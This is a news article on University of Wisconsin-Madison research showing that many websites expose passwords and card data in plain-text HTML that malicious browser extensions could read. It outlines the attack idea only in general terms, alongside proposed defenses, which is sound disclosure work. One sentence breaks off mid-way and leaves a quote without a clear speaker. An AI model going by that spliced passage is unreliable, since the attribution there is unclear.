From ********* to EZacces$! Your browser extension could grab your password and sensitive info

When you type a password or credit card number into a website, you expect that your sensitive data will be protected by a system designed to keep it secure.

That’s not always the case, according to a group of digital security researchers at the University of Wisconsin-Madison. They found that some popular websites are vulnerable to browser extensions that can extract user data like passwords, credit card information and social security numbers from HTML code. A preprint of their work has already created a buzz in tech circles.

The team includes Rishabh Khandelwal and Asmit Nayak, PhD students who work with Kassem Fawaz , a UW-Madison associate professor of electrical and computer engineering. The trio first discovered the issue while investigating Google login webpages.

"We were just messing around with login pages, and in the HTML source code we could see the password in plain text," says Nayak. "We thought, ’This is interesting. Why is this happening? Is it possible that other websites are doing something similar?’ Then we started digging deeper."

They discovered a big issue. The researchers found that a huge number of websites - about 15% of more than 7,000 they looked at - store sensitive information as plain text in their HTML source code. While many security measures keep hackers from accessing this data, the team hypothesized that it might be possible to find it using a browser extension.

Browser extensions are add-ons that, using small bits of code, allow users to customize their internet experience, for example by blocking ads or improving time management. Browser developers sometimes introduce experimental features via extensions while also allowing third-party developers to offer their own extensions for users to try. The researchers found that a malevolent extension could use code written in a common programming language to grab users’ login "Somebody who’s malicious does not need to start from scratch," he says. "They can get access to existing extensions, for instance, by buying one with lots of users and tweaking the code a little bit. They could maintain the functionality and get access to the passwords very easily."

Fawaz says it’s likely that the vulnerability isn’t an oversight; instead, browser security is configured this way to let popular password manager extensions access password information. For its part, in a statement to the researchers, Google says that it is looking into the matter but does not consider this a security flaw, especially if permissions for the extensions are configured correctly.

Fawaz, however, is still concerned, and he hopes his research will convince websites to rethink the way they handle this sensitive information. His team proposes alerts to let users know when sensitive data is being accessed by browser extensions, as well as tools for developers to protect these data fields.

"It’s a dangerous thing," Fawaz says. "This is something that people really need to know: Passwords aren’t always safe on browsers."